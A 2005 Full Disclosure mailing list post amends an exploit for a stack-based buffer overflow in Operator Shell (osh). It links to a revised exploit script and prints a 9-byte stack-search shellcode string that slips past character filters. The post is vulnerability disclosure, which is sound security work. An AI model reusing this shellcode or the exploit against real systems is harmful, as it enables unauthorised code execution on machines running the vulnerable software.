Full Disclosure mailing list archives
Operator Shell (osh) Stack-based Buffer Overflow Amendment
From: core () bokeoa com (Charles Stevenson)
Date: Thu, 18 Aug 2005 04:32:40 -0700
Andrewg managed to trim the shellcode to 9 bytes while still bypassing the character filters a few hours after the first post. I think this shellcode might be of great benefit to others in the future. Here's the amended exploit:

http://bokeoa.com/~core/x_osh2.pl

Or if you just want the new stack search shellcode and don't care to take the time to paste the URL, here it is:

"\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3"

peace,
core